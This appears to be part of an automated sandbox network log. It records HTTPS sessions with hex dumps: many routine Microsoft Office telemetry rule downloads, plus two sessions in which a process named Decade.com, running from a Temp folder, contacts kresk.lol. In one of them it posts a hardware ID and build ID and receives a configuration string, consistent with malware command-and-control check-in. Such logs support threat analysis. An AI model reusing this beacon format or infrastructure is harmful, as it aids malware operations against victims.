2024-12-04 11:17:05 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:05 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 4628c04c-d01e-0017-18cc-45b035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111705Z-1746fd949bd54zxghC1EWRzre400000001c0000000005u62 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:05 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49748	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:05 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:05 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:05 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 4a622c55-e01e-0099-7fc1-45da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111705Z-1746fd949bdnq7x2hC1EWRpxr00000000100000000003e2b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:05 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49746	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:05 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:05 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:05 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: d3611829-901e-007b-22c2-45ac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111705Z-1746fd949bd2cq7chC1EWRnx9g00000000s0000000004umy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:05 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49749	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:05 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:05 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:05 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: dbf49064-101e-00a2-1bc6-459f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111705Z-1746fd949bdb8xvchC1EWRmbd4000000012g000000004m2e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:05 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:05 UTC	224	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49752	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:07 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:07 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:07 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: c2a94a43-501e-00a0-7dd0-459d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111707Z-1746fd949bdl6zq5hC1EWRf3ws00000000ug000000003rcm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:07 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49751	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:07 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:07 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:07 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 2b878731-501e-008c-34ce-45cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111707Z-1746fd949bdjrnwqhC1EWRpg280000000130000000007rxh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:07 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49753	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:07 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:07 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:07 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 6818e2c2-d01e-0065-16d2-45b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111707Z-1746fd949bdnq7x2hC1EWRpxr0000000011g000000001fg5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:07 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49754	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:07 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:07 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:07 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: 6223bc78-401e-0015-38b6-450e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111707Z-1746fd949bdfg4slhC1EWR34t000000000x0000000007yyh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:07 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49755	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:07 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:07 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:07 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 864f0b94-901e-00a0-42cc-456a6d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111707Z-1746fd949bddtfvqhC1EWRxbpg000000010g000000006f2t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:07 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:07 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KNGDBS0R1N7QQIMOZMYU User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:07 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4e 47 44 42 53 30 52 31 4e 37 51 51 49 4d 4f 5a 4d 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 30 45 35 35 38 45 41 31 43 39 33 37 34 30 31 30 35 32 38 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 47 44 42 53 30 52 31 4e 37 51 51 49 4d 4f 5a 4d 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 47 44 42 53 30 52 31 4e 37 51 51 49 4d 4f 5a 4d 59 55 2d 2d 0d Data Ascii: ------KNGDBS0R1N7QQIMOZMYUContent-Disposition: form-data; name="hwid"5E0E558EA1C93740105281-a33c7340-61ca------KNGDBS0R1N7QQIMOZMYUContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------KNGDBS0R1N7QQIMOZMYU--
2024-12-04 11:17:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:08 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|89649d68b3d4f045f27de58598ef771d\|1\|0\|1\|1\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49757	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:09 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:09 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:09 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: b5189c33-801e-008c-34cb-457130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111709Z-1746fd949bd6zq92hC1EWRry480000000140000000003wr6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:09 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49758	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:09 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:09 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:09 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 16655d81-601e-0084-07c4-456b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111709Z-1746fd949bdwt8wrhC1EWRu6rg00000001a0000000003tqp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
